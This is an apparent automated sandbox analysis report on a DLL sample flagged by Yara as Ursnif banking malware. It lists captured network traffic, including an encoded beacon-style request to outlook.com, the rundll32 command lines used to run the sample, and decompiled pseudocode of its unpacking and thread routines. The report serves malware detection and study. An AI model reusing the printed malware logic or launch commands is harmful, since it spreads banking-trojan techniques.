May 12, 2021 13:07:57.508028984 CEST	443	49756	52.97.233.66	192.168.2.4
May 12, 2021 13:07:57.508058071 CEST	443	49756	52.97.233.66	192.168.2.4
May 12, 2021 13:07:57.508086920 CEST	49757	443	192.168.2.4	52.97.233.66
May 12, 2021 13:07:57.508121967 CEST	49756	443	192.168.2.4	52.97.233.66
May 12, 2021 13:07:57.510467052 CEST	443	49756	52.97.233.66	192.168.2.4
May 12, 2021 13:07:57.510528088 CEST	49756	443	192.168.2.4	52.97.233.66
May 12, 2021 13:07:57.511269093 CEST	49756	443	192.168.2.4	52.97.233.66
May 12, 2021 13:07:57.559741020 CEST	443	49756	52.97.233.66	192.168.2.4
May 12, 2021 13:07:57.595808029 CEST	49758	443	192.168.2.4	40.101.137.82
May 12, 2021 13:07:57.595855951 CEST	49759	443	192.168.2.4	40.101.137.82
May 12, 2021 13:07:57.645627022 CEST	443	49759	40.101.137.82	192.168.2.4
May 12, 2021 13:07:57.645654917 CEST	443	49758	40.101.137.82	192.168.2.4
May 12, 2021 13:07:57.645747900 CEST	49759	443	192.168.2.4	40.101.137.82
May 12, 2021 13:07:57.645814896 CEST	49758	443	192.168.2.4	40.101.137.82
May 12, 2021 13:07:57.649241924 CEST	49759	443	192.168.2.4	40.101.137.82
May 12, 2021 13:07:57.650088072 CEST	49758	443	192.168.2.4	40.101.137.82
May 12, 2021 13:07:57.701133013 CEST	443	49759	40.101.137.82	192.168.2.4
May 12, 2021 13:07:57.701167107 CEST	443	49759	40.101.137.82	192.168.2.4
May 12, 2021 13:07:57.701189041 CEST	443	49759	40.101.137.82	192.168.2.4
May 12, 2021 13:07:57.701257944 CEST	49759	443	192.168.2.4	40.101.137.82
May 12, 2021 13:07:57.701292038 CEST	49759	443	192.168.2.4	40.101.137.82
May 12, 2021 13:07:57.701807976 CEST	443	49758	40.101.137.82	192.168.2.4
May 12, 2021 13:07:57.701838017 CEST	443	49758	40.101.137.82	192.168.2.4
May 12, 2021 13:07:57.701862097 CEST	443	49758	40.101.137.82	192.168.2.4
May 12, 2021 13:07:57.701891899 CEST	49758	443	192.168.2.4	40.101.137.82
May 12, 2021 13:07:57.701932907 CEST	49758	443	192.168.2.4	40.101.137.82
May 12, 2021 13:07:57.715931892 CEST	49759	443	192.168.2.4	40.101.137.82
May 12, 2021 13:07:57.716289043 CEST	49759	443	192.168.2.4	40.101.137.82
May 12, 2021 13:07:57.720307112 CEST	49758	443	192.168.2.4	40.101.137.82
May 12, 2021 13:07:57.765304089 CEST	443	49759	40.101.137.82	192.168.2.4
May 12, 2021 13:07:57.766113043 CEST	443	49759	40.101.137.82	192.168.2.4
May 12, 2021 13:07:57.766210079 CEST	49759	443	192.168.2.4	40.101.137.82
May 12, 2021 13:07:57.770592928 CEST	443	49758	40.101.137.82	192.168.2.4
May 12, 2021 13:07:57.770699978 CEST	49758	443	192.168.2.4	40.101.137.82
May 12, 2021 13:07:57.794503927 CEST	443	49759	40.101.137.82	192.168.2.4
May 12, 2021 13:07:57.794528008 CEST	443	49759	40.101.137.82	192.168.2.4
May 12, 2021 13:07:57.794564962 CEST	49759	443	192.168.2.4	40.101.137.82
May 12, 2021 13:07:57.794585943 CEST	49759	443	192.168.2.4	40.101.137.82
May 12, 2021 13:07:58.988245010 CEST	49754	80	192.168.2.4	40.97.153.146
May 12, 2021 13:07:58.988343954 CEST	49759	443	192.168.2.4	40.101.137.82
May 12, 2021 13:07:58.989630938 CEST	49757	443	192.168.2.4	52.97.233.66
May 12, 2021 13:07:58.989656925 CEST	49758	443	192.168.2.4	40.101.137.82

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 13:06:00.430233955 CEST	53097	53	192.168.2.4	8.8.8.8
May 12, 2021 13:06:00.479023933 CEST	53	53097	8.8.8.8	192.168.2.4
May 12, 2021 13:06:01.537579060 CEST	49257	53	192.168.2.4	8.8.8.8
May 12, 2021 13:06:01.589147091 CEST	53	49257	8.8.8.8	192.168.2.4
May 12, 2021 13:06:01.686364889 CEST	62389	53	192.168.2.4	8.8.8.8
May 12, 2021 13:06:01.749185085 CEST	53	62389	8.8.8.8	192.168.2.4
May 12, 2021 13:06:02.330004930 CEST	49910	53	192.168.2.4	8.8.8.8
May 12, 2021 13:06:02.381606102 CEST	53	49910	8.8.8.8	192.168.2.4
May 12, 2021 13:06:03.079670906 CEST	55854	53	192.168.2.4	8.8.8.8
May 12, 2021 13:06:03.131386995 CEST	53	55854	8.8.8.8	192.168.2.4
May 12, 2021 13:06:03.838140965 CEST	64549	53	192.168.2.4	8.8.8.8
May 12, 2021 13:06:03.890248060 CEST	53	64549	8.8.8.8	192.168.2.4
May 12, 2021 13:06:05.137980938 CEST	63153	53	192.168.2.4	8.8.8.8
May 12, 2021 13:06:05.186661959 CEST	53	63153	8.8.8.8	192.168.2.4
May 12, 2021 13:06:06.116621017 CEST	52991	53	192.168.2.4	8.8.8.8
May 12, 2021 13:06:06.165359974 CEST	53	52991	8.8.8.8	192.168.2.4
May 12, 2021 13:06:07.012972116 CEST	53700	53	192.168.2.4	8.8.8.8
May 12, 2021 13:06:07.064455986 CEST	53	53700	8.8.8.8	192.168.2.4
May 12, 2021 13:06:59.158689022 CEST	51726	53	192.168.2.4	8.8.8.8
May 12, 2021 13:06:59.218735933 CEST	53	51726	8.8.8.8	192.168.2.4
May 12, 2021 13:07:13.575684071 CEST	56794	53	192.168.2.4	8.8.8.8
May 12, 2021 13:07:13.624511003 CEST	53	56794	8.8.8.8	192.168.2.4
May 12, 2021 13:07:33.184400082 CEST	56534	53	192.168.2.4	8.8.8.8
May 12, 2021 13:07:33.233283997 CEST	53	56534	8.8.8.8	192.168.2.4
May 12, 2021 13:07:34.089867115 CEST	56627	53	192.168.2.4	8.8.8.8
May 12, 2021 13:07:34.147365093 CEST	53	56627	8.8.8.8	192.168.2.4
May 12, 2021 13:07:35.026246071 CEST	56621	53	192.168.2.4	8.8.8.8
May 12, 2021 13:07:35.086539030 CEST	53	56621	8.8.8.8	192.168.2.4
May 12, 2021 13:07:35.351069927 CEST	63116	53	192.168.2.4	8.8.8.8
May 12, 2021 13:07:35.401068926 CEST	53	63116	8.8.8.8	192.168.2.4
May 12, 2021 13:07:36.008440971 CEST	64078	53	192.168.2.4	8.8.8.8
May 12, 2021 13:07:36.083830118 CEST	53	64078	8.8.8.8	192.168.2.4
May 12, 2021 13:07:37.127737045 CEST	64801	53	192.168.2.4	8.8.8.8
May 12, 2021 13:07:37.176460028 CEST	53	64801	8.8.8.8	192.168.2.4
May 12, 2021 13:07:38.093313932 CEST	61721	53	192.168.2.4	8.8.8.8
May 12, 2021 13:07:38.143081903 CEST	53	61721	8.8.8.8	192.168.2.4
May 12, 2021 13:07:39.032254934 CEST	51255	53	192.168.2.4	8.8.8.8
May 12, 2021 13:07:39.081478119 CEST	53	51255	8.8.8.8	192.168.2.4
May 12, 2021 13:07:41.426986933 CEST	61522	53	192.168.2.4	8.8.8.8
May 12, 2021 13:07:41.476294041 CEST	53	61522	8.8.8.8	192.168.2.4
May 12, 2021 13:07:42.213614941 CEST	52337	53	192.168.2.4	8.8.8.8
May 12, 2021 13:07:42.263492107 CEST	53	52337	8.8.8.8	192.168.2.4
May 12, 2021 13:07:42.913527966 CEST	55046	53	192.168.2.4	8.8.8.8
May 12, 2021 13:07:42.973959923 CEST	53	55046	8.8.8.8	192.168.2.4
May 12, 2021 13:07:43.147269964 CEST	49612	53	192.168.2.4	8.8.8.8
May 12, 2021 13:07:43.198693991 CEST	53	49612	8.8.8.8	192.168.2.4
May 12, 2021 13:07:44.032737017 CEST	49285	53	192.168.2.4	8.8.8.8
May 12, 2021 13:07:44.083465099 CEST	53	49285	8.8.8.8	192.168.2.4
May 12, 2021 13:07:54.982896090 CEST	50601	53	192.168.2.4	8.8.8.8
May 12, 2021 13:07:55.040282965 CEST	53	50601	8.8.8.8	192.168.2.4
May 12, 2021 13:07:56.442893982 CEST	60875	53	192.168.2.4	8.8.8.8
May 12, 2021 13:07:56.493007898 CEST	53	60875	8.8.8.8	192.168.2.4
May 12, 2021 13:07:57.287398100 CEST	56448	53	192.168.2.4	8.8.8.8
May 12, 2021 13:07:57.337733984 CEST	53	56448	8.8.8.8	192.168.2.4
May 12, 2021 13:07:57.538420916 CEST	59172	53	192.168.2.4	8.8.8.8
May 12, 2021 13:07:57.587490082 CEST	53	59172	8.8.8.8	192.168.2.4
May 12, 2021 13:08:01.508614063 CEST	62420	53	192.168.2.4	8.8.8.8
May 12, 2021 13:08:01.557399988 CEST	53	62420	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 12, 2021 13:07:56.442893982 CEST	192.168.2.4	8.8.8.8	0x4465	Standard query (0)	outlook.com	A (IP address)	IN (0x0001)
May 12, 2021 13:07:57.287398100 CEST	192.168.2.4	8.8.8.8	0x80a2	Standard query (0)	www.outlook.com	A (IP address)	IN (0x0001)
May 12, 2021 13:07:57.538420916 CEST	192.168.2.4	8.8.8.8	0x4050	Standard query (0)	outlook.office365.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 12, 2021 13:07:35.401068926 CEST	8.8.8.8	192.168.2.4	0x64b5	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 13:07:56.493007898 CEST	8.8.8.8	192.168.2.4	0x4465	No error (0)	outlook.com		40.97.153.146	A (IP address)	IN (0x0001)
May 12, 2021 13:07:56.493007898 CEST	8.8.8.8	192.168.2.4	0x4465	No error (0)	outlook.com		40.97.161.50	A (IP address)	IN (0x0001)
May 12, 2021 13:07:56.493007898 CEST	8.8.8.8	192.168.2.4	0x4465	No error (0)	outlook.com		40.97.116.82	A (IP address)	IN (0x0001)
May 12, 2021 13:07:56.493007898 CEST	8.8.8.8	192.168.2.4	0x4465	No error (0)	outlook.com		40.97.160.2	A (IP address)	IN (0x0001)
May 12, 2021 13:07:56.493007898 CEST	8.8.8.8	192.168.2.4	0x4465	No error (0)	outlook.com		40.97.148.226	A (IP address)	IN (0x0001)
May 12, 2021 13:07:56.493007898 CEST	8.8.8.8	192.168.2.4	0x4465	No error (0)	outlook.com		40.97.164.146	A (IP address)	IN (0x0001)
May 12, 2021 13:07:56.493007898 CEST	8.8.8.8	192.168.2.4	0x4465	No error (0)	outlook.com		40.97.128.194	A (IP address)	IN (0x0001)
May 12, 2021 13:07:56.493007898 CEST	8.8.8.8	192.168.2.4	0x4465	No error (0)	outlook.com		40.97.156.114	A (IP address)	IN (0x0001)
May 12, 2021 13:07:57.337733984 CEST	8.8.8.8	192.168.2.4	0x80a2	No error (0)	www.outlook.com	outlook.office365.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 13:07:57.337733984 CEST	8.8.8.8	192.168.2.4	0x80a2	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 13:07:57.337733984 CEST	8.8.8.8	192.168.2.4	0x80a2	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 13:07:57.337733984 CEST	8.8.8.8	192.168.2.4	0x80a2	No error (0)	outlook.ms-acdc.office.com	HHN-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 13:07:57.337733984 CEST	8.8.8.8	192.168.2.4	0x80a2	No error (0)	HHN-efz.ms-acdc.office.com		52.97.233.66	A (IP address)	IN (0x0001)
May 12, 2021 13:07:57.337733984 CEST	8.8.8.8	192.168.2.4	0x80a2	No error (0)	HHN-efz.ms-acdc.office.com		40.101.137.98	A (IP address)	IN (0x0001)
May 12, 2021 13:07:57.337733984 CEST	8.8.8.8	192.168.2.4	0x80a2	No error (0)	HHN-efz.ms-acdc.office.com		52.98.152.178	A (IP address)	IN (0x0001)
May 12, 2021 13:07:57.337733984 CEST	8.8.8.8	192.168.2.4	0x80a2	No error (0)	HHN-efz.ms-acdc.office.com		52.97.233.82	A (IP address)	IN (0x0001)
May 12, 2021 13:07:57.587490082 CEST	8.8.8.8	192.168.2.4	0x4050	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 13:07:57.587490082 CEST	8.8.8.8	192.168.2.4	0x4050	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 13:07:57.587490082 CEST	8.8.8.8	192.168.2.4	0x4050	No error (0)	outlook.ms-acdc.office.com	HHN-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 13:07:57.587490082 CEST	8.8.8.8	192.168.2.4	0x4050	No error (0)	HHN-efz.ms-acdc.office.com		40.101.137.82	A (IP address)	IN (0x0001)
May 12, 2021 13:07:57.587490082 CEST	8.8.8.8	192.168.2.4	0x4050	No error (0)	HHN-efz.ms-acdc.office.com		52.97.233.98	A (IP address)	IN (0x0001)
May 12, 2021 13:07:57.587490082 CEST	8.8.8.8	192.168.2.4	0x4050	No error (0)	HHN-efz.ms-acdc.office.com		40.101.136.18	A (IP address)	IN (0x0001)
May 12, 2021 13:07:57.587490082 CEST	8.8.8.8	192.168.2.4	0x4050	No error (0)	HHN-efz.ms-acdc.office.com		52.98.175.18	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

outlook.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49753	40.97.153.146	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 13:07:56.654592991 CEST	1552	OUT	GET /login/greed/KnH9H6Qjc_2F7/0e3_2F0_/2FRqQPyOKs18rFK5waVCGCI/jIBCBbgDdF/18TiURZdioL3eU4Wc/SUXArexakZ5d/R0lDxIGeIYj/c6FwtLcTr3EmEj/nbrTM1t_2BdTxREGmfFhs/_2BnTf5cT9dEAnPd/AFLbs3lARk22SMJ/POUz7dti2oyFXHE3_2/FgEVGs1vD/4LhoHpnAxyp/chUrsX.gfk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: outlook.com Connection: Keep-Alive
May 12, 2021 13:07:56.787769079 CEST	1552	IN	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Pragma: no-cache Location: https://outlook.com/login/greed/KnH9H6Qjc_2F7/0e3_2F0_/2FRqQPyOKs18rFK5waVCGCI/jIBCBbgDdF/18TiURZdioL3eU4Wc/SUXArexakZ5d/R0lDxIGeIYj/c6FwtLcTr3EmEj/nbrTM1t_2BdTxREGmfFhs/_2BnTf5cT9dEAnPd/AFLbs3lARk22SMJ/POUz7dti2oyFXHE3_2/FgEVGs1vD/4LhoHpnAxyp/chUrsX.gfk Server: Microsoft-IIS/10.0 request-id: d22bf8f3-ef91-4d9e-851c-4890d74dfbb5 X-FEServer: BN6PR2001CA0017 X-RequestId: 83f746fe-8412-4293-9793-e5f694c948c0 X-Powered-By: ASP.NET X-FEServer: BN6PR2001CA0017 Date: Wed, 12 May 2021 11:07:56 GMT Connection: close Content-Length: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6924 Parent PID: 6012

General

Start time:	13:06:05
Start date:	12/05/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\nT5pUwoJSS.dll'
Imagebase:	0x190000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6936 Parent PID: 6924

General

Start time:	13:06:06
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\nT5pUwoJSS.dll',#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6948 Parent PID: 6924

General

Start time:	13:06:06
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\nT5pUwoJSS.dll,Eithernothing
Imagebase:	0x2a0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6960 Parent PID: 6936

General

Start time:	13:06:06
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\nT5pUwoJSS.dll',#1
Imagebase:	0x2a0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.881584954.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.881638380.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.881444184.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.881614039.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.881537844.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.881689753.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.881502007.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.881360850.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6992 Parent PID: 6924

General

Start time:	13:06:10
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\nT5pUwoJSS.dll,Order
Imagebase:	0x2a0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7008 Parent PID: 6924

General

Start time:	13:06:14
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\nT5pUwoJSS.dll,Smileschool
Imagebase:	0x2a0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 64 Parent PID: 6992

General

Start time:	13:07:51
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6992 -s 892
Imagebase:	0xcf0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5516 Parent PID: 800

General

Start time:	13:07:53
Start date:	12/05/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff7fded0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4556 Parent PID: 5516

General

Start time:	13:07:54
Start date:	12/05/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5516 CREDAT:17410 /prefetch:2
Imagebase:	0xe90000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6924 Parent PID: 6012 loaddll32.exeCOMMON

Executed Functions

Function 6D481237, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6D481237(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E6D481CDD();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E6D4810E8(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E6D48179C(E6D481424,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E6D481BE5(_t44,  &_a4) != 0) {
					 *0x6d484138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t48 =  *_t55(_t43, 0, 0);
				if(_t48 == 0) {
					L9:
					 *0x6d484138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E6D481CC8(_t48 + _t14);
				 *0x6d484138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48);
				E6D48133D(_t43);
				goto L11;
			}

0x6d48123e
0x6d481245
0x6d48124a
0x6d48133a
0x6d48133a
0x6d481251
0x6d481255
0x6d48125b
0x6d481269
0x6d48126a
0x6d48126d
0x6d481270
0x6d481279
0x6d48127c
0x6d481282
0x6d481285
0x6d48128c
0x6d481337
0x00000000
0x6d481337
0x6d481296
0x6d4812e7
0x6d4812e7
0x6d4812fd
0x6d481302
0x6d48132a
0x6d481304
0x6d481307
0x6d48130d
0x6d481312
0x6d481319
0x6d481319
0x6d481320
0x6d481320
0x6d48132d
0x6d481333
0x6d481335
0x6d481335
0x00000000
0x6d481333
0x6d4812a3
0x6d4812e1
0x00000000
0x6d4812e1
0x6d4812a5
0x6d4812a8
0x6d4812b3
0x6d4812b7
0x6d4812d9
0x6d4812d9
0x00000000
0x6d4812d9
0x6d4812b9
0x6d4812be
0x6d4812c3
0x6d4812ca
0x00000000
0x00000000
0x6d4812cf
0x6d4812d2
0x00000000

APIs

Part of subcall function 6D481CDD: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D481243,73B763F0), ref: 6D481CEC
Part of subcall function 6D481CDD: GetVersion.KERNEL32 ref: 6D481CFB
Part of subcall function 6D481CDD: GetCurrentProcessId.KERNEL32 ref: 6D481D17
Part of subcall function 6D481CDD: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D481D30

GetSystemTime.KERNEL32(?,00000000,73B763F0), ref: 6D481255
SwitchToThread.KERNEL32 ref: 6D48125B

Part of subcall function 6D4810E8: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6D48113E
Part of subcall function 6D4810E8: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6D481204

Sleep.KERNELBASE(00000000,00000000), ref: 6D48127C
GetLongPathNameW.KERNEL32 ref: 6D4812B1
GetLongPathNameW.KERNEL32 ref: 6D4812CF
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6D481307
GetExitCodeThread.KERNEL32(00000000,?), ref: 6D481319
CloseHandle.KERNEL32(00000000), ref: 6D481320
GetLastError.KERNEL32(?,00000000), ref: 6D481328
GetLastError.KERNEL32 ref: 6D481335

Memory Dump Source

Source File: 00000000.00000002.909910325.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000000.00000002.909897019.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909931853.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909941537.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909962633.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
String ID:
API String ID: 1962885430-0
Opcode ID: 9802d0f81ea4b0799d967ae315c9df8a216da203c19499a6f3b98b71ea7f0845
Instruction ID: d566dd2cf2860a36330af792db5eb64f1c04aafaf4cc3ddbd0af6cd6f491215f
Opcode Fuzzy Hash: 9802d0f81ea4b0799d967ae315c9df8a216da203c19499a6f3b98b71ea7f0845
Instruction Fuzzy Hash: B9318875C04655ABDB01EBA98C88EAE77BDEB473E5B21411BE521E3242E734CD00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4F5770, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000007D1,00003000,00000040,000007D1,6D4F51C8), ref: 6D4F582D
VirtualAlloc.KERNEL32(00000000,00000059,00003000,00000040,6D4F5229), ref: 6D4F5864
VirtualAlloc.KERNEL32(00000000,00016DD9,00003000,00000040), ref: 6D4F58C4
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D4F58FA
VirtualProtect.KERNEL32(6D480000,00000000,00000004,6D4F574F), ref: 6D4F59FF
VirtualProtect.KERNEL32(6D480000,00001000,00000004,6D4F574F), ref: 6D4F5A26
VirtualProtect.KERNEL32(00000000,?,00000002,6D4F574F), ref: 6D4F5AF3
VirtualProtect.KERNEL32(00000000,?,00000002,6D4F574F,?), ref: 6D4F5B49
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D4F5B65

Memory Dump Source

Source File: 00000000.00000002.910131229.000000006D4F5000.00000040.00020000.sdmp, Offset: 6D4F5000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 25725fe3ea5edefb74e8182b314af060065adca4d4aa0626c8a3a422ebf314a2
Instruction ID: f76783f284efcf437e2985aabff377be92238d9e6f25f203477de718fe0d538d
Opcode Fuzzy Hash: 25725fe3ea5edefb74e8182b314af060065adca4d4aa0626c8a3a422ebf314a2
Instruction Fuzzy Hash: 77D19FB25046019FEB25CF04C880F6177B5FF98314B19A198ED5D9F76ADB30A821CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B8960, Relevance: 3.7, Strings: 2, Instructions: 1211COMMON

Download Yara Rule

Strings

e, xrefs: 6D4B8CE5
Q, xrefs: 6D4B939D

Memory Dump Source

Source File: 00000000.00000002.909995385.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID:
String ID: Q$e
API String ID: 0-1578101220
Opcode ID: ae910a30291d06ee68596d2dc65c8f53defb537d7f1816d8b8a2529fadb27f00
Instruction ID: b6ed3f667ff580a1c0e093bfa9d1973f423117b7c5dbe309a69c7d437417b699
Opcode Fuzzy Hash: ae910a30291d06ee68596d2dc65c8f53defb537d7f1816d8b8a2529fadb27f00
Instruction Fuzzy Hash: 80A20671A052119FCB14EF39E888B657BB2E7D6308B15822FD5488B3ADD734DC19CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6D481F56, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
